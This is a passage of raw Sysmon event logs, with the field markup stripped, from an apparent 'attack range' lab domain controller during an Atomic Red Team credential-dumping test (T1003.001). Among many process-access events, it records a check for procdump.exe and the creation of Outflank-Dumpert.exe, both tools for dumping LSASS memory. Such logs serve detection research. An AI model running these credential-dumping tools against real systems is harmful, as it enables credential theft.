ystem.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 10341000x800000000000000024913Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.010{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024912Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.010{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024911Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.010{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024910Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.010{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024909Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.014{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000024992Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:56.948{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A324-60D3-3506-00000000CF01}5732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024991Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:56.948{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024990Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:56.948{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024989Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:56.948{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024988Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:56.948{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024987Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:56.948{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A324-60D3-3506-00000000CF01}5732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024986Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:56.948{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A324-60D3-3506-00000000CF01}5732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024985Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:56.949{4DB9351A-A324-60D3-3506-00000000CF01}5732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024984Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:56.479{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E0FA4B97996E98306CEA1B0CB1F5A1ED,SHA256=742398D79F2C7AC3CC4BDFEEF5928C4CCBB73070B723A15EF729847A4778E586,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024983Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:09:56.385{4DB9351A-A323-60D3-3406-00000000CF01}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe2021-06-23 21:09:56.385 23542300x800000000000000024982Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:56.057{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DA3F2A8D461FDFB3251C97D1CBB3EEF,SHA256=2A15036FB4CB73004140EB436B6DA50BCD52CECD5CB6E867A746DC84EA2CA8E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024981Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:56.057{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4368BAE50DC83399021B292B56997B13,SHA256=CBBE0954CAFC330BA183CDE1D944119B2AFE6427764C0FDE461CA8550E331BC0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025017Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.948{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A325-60D3-3706-00000000CF01}6172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025016Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.901{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A325-60D3-3706-00000000CF01}6172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025015Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.901{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A325-60D3-3706-00000000CF01}6172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025014Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.901{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025013Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.901{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025012Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.901{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025011Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.901{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025010Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.901{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A325-60D3-3706-00000000CF01}6172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025009Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.901{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A325-60D3-3706-00000000CF01}6172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0a